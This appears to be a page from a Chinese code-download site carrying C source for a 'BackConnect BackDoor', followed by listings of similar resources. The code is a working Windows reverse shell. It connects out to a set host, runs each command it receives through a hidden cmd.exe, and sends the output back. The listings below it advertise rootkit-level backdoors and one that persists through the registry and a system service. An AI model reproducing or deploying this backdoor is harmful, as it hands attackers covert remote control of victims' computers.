#include<winsock2.h>
#include<stdio.h>
#pragma comment(lib,"ws2_32.lib")
void main(int argc,char **argv)
{
char *messages = "/r/n======================== BackConnect BackDoor V0.1 ========================/r/n========= Welcome to Http://www.hackerxfiles.net =========/r/n";
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
char buf1[1024]; //作为socket接收数据的缓冲区
memset(buf1,0,1024); //清空缓冲区
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:d/n",WSAGetLastError());
return;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(80); //反向连接的远端主机端口
addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1"); //远端IP
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:d/n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) //连接客户主机
{
printf("Connect failed.Error:d",WSAGetLastError());
return;
}
if (send(sock,messages,strlen(messages),0)==SOCKET_ERROR) //发送欢迎信息
{
printf("Send failed.Error:d/n",WSAGetLastError());
return;
}
char buffer[2048] = {0};//管道输出的数据
for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){
SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hWrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
printf("Error On CreatePipe()");
return;
}
STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
GetSystemDirectory(cmdline,MAX_PATH+1);
strcat(cmdline,"//cmd.exe /c");
int len=recv(sock,buf1,1024,NULL);
if(len==SOCKET_ERROR)exit(0); //如果客户端断开连接,则自动退出程序
if(len<=1){send(sock,"error/n",sizeof("error/n"),0);continue;}
strncat(cmdline,buf1,strlen(buf1)); //把命令参数复制到cmdline
if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
send(sock,"Error command/n",sizeof("Error command/n"),0);
continue;
}
CloseHandle(hWrite);
//循环读取管道中数据并发送,直到管道中没有数据为止
for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048)){
send(sock,buffer,strlen(buffer),0);
}
}
}
分享到:
相关推荐
用C实现的反向连接后门代码。具有反向连接功能,服务器端通过域名解析向客户端发起建立连接请求。
清凉CMD反向连接后门,仅供学习,希望大家不要学坏- -。。。。
外链分析工具net反向连接查询工具net反向连接查询工具net反向连接查询工具net反向连接查询工具
经典反向后门源代码(可用)vc++6.0反弹木马
将一个单向链表反向连接
用Rational Rose对VC++进行反向工程(将VC++代码生成组件图).
[ROOTKIT级反响后门] 能彻底隐藏自己的功能很全的ROOTKIT级的反向连接后门 Dolphin Remote Control V1.0 horse_b create at 2006年04月19日 说明: DRC是一个功能齐全的反向ROOTKIT级后门,支持...
vc++正想和反向画圆,现在只能得到坐标。
visio 如何反向连接数据库生成er图
pyvidc-超级中介的说明:这个软件的创意来自yyc写的vidc的反向连接的功能,我把它极致化了。它本身不存在任何独立应用的价值,它的价值体现在它所连接的其他端口上,比如远程桌面,socks代理。 它的优点:只需要一个...
自动反复链接,cmd反向链接 vc++. 最好的例子,代码最少的例子反复链接,直到链接上为止
本程序利用winsockAPI函数在vc下编程,监听对方主机某一指定端口,当对方主机尝试打开该端口即达到连接目的。不具有破坏性,只演示了winsock的使用,提供思路。
功能简介:运行后自删除,写注册表Run下,同时自拷贝到系统目录下,注册为系统服务SvrDemo,修改文件时间同Cmd.exe,每隔俩秒钟连接一次本地(127.0.0.1)的600端口,ip地址和端口可自行修改,部分代码来源于网上修改,...
Oracle连接sqlserver与反向连接.doc
Oracle连接sqlserver与反向连接.pdf
憔悴工作室反向后门生成器 是一款很不错的软件 更多精品软件 请登录www.qcgzs.80.hk
一个反向后门实例是c++的工程,网络编程,多进程线程,绝对对你有帮助
SE 4.0 R87 汉化(优秀反向连接工具).7z 由于找不到理想的汉化工具 汉化只做了主要部分、、、、 请大家愿谅。。。。 如果哪位有好的汉化工具请大家给我说一下、、、、、 QQ 876973190 感谢、、、
google 关键词 以及seo 增加网站反向连接等知识